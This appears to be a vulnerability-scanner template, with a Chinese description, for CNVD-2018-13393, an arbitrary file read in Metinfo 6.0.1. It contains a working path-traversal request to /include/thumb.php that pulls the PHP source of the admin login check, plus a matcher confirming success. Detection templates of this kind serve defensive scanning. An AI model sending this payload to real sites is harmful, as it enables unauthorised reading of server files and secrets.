漏洞描述
介绍: Metinfo 6.0.1 存在任意文件读取漏洞,攻击者可通过构造恶意请求获取服务器上的任意文件。
id: CNVD-2018-13393
info:
name: Metinfo file read
author: JingLing
severity: high
verified: false
description: |
介绍: Metinfo 6.0.1 存在任意文件读取漏洞,攻击者可通过构造恶意请求获取服务器上的任意文件。
tags: cnvd,cnvd2018,fileread,metinfo
created: 2020/09/11
rules:
r0:
request:
method: GET
path: /include/thumb.php?dir=http\..\admin\login\login_check.php
follow_redirects: true
expression: response.body.bcontains(b"<?php") && response.body.bcontains(b"login_met_cookie($metinfo_admin_name);")
expression: r0()